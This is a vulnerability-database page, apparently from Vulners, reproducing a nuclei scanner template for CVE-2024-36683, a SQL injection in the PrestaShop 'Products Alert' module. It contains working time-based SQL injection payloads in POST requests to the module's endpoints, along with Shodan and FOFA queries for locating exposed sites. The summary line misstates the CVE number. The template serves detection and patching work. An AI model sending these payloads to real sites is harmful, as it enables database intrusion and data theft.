Lucene search
K

PrestaShop productsalert - SQL Injection

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 60 Views

PrestaShop 'Products Alert' SQL Injection in version 1.7.4 allows arbitrary SQL queries leading to unauthorized access and data leakage. CVE-2024-3668

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-36683
22 Sep 202423:29
circl
CNNVD
PrestaShop Security Breach
24 Jun 202400:00
cnnvd
CVE
CVE-2024-36683
24 Jun 202400:00
cve
Cvelist
CVE-2024-36683
24 Jun 202400:00
cvelist
NVD
CVE-2024-36683
24 Jun 202423:15
nvd
Positive Technologies
PT-2024-27127 · Prestashop · Products Alert
24 Jun 202400:00
ptsecurity
RedhatCVE
CVE-2024-36683
23 May 202509:30
redhatcve
Vulnrichment
CVE-2024-36683
24 Jun 202400:00
vulnrichment
id: CVE-2024-36683

info:
  name: PrestaShop productsalert - SQL Injection
  author: mastercho
  severity: critical
  description: |
    In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  reference:
    - https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36683
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-36683
    cwe-id: CWE-89
    epss-score: 0.00963
    epss-percentile: 0.57343
  metadata:
    verified: true
    max-request: 2
    framework: prestashop
    shodan-query: html:"/productsalert"
    fofa-query: body="/productsalert"
  tags: time-based-sqli,cve,cve2024,prestashop,sqli,productsalert,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(tolower(body), "productsalert", "prestashop")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(8)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158

      - |
        @timeout: 30s
        POST /module/productsalert/AjaxProcess HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(8)))IuFA) AND 'pAlk'='pAlk&pid=13158

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers-condition: or
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - 'duration_1>=8 && status_code_1 != 404'
          - 'duration_2>=8 && status_code_2 != 404'
        condition: or
# digest: 4b0a0048304602210087b63036868412b4c80f7dbe81882033bdeba19659d0957eaba4ecdf2e83c5e6022100a8fac87f861f023ecdd37bb070efede30102c09fef5ebe03e84e75b04193db8e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.3
EPSS0.00963
SSVC
60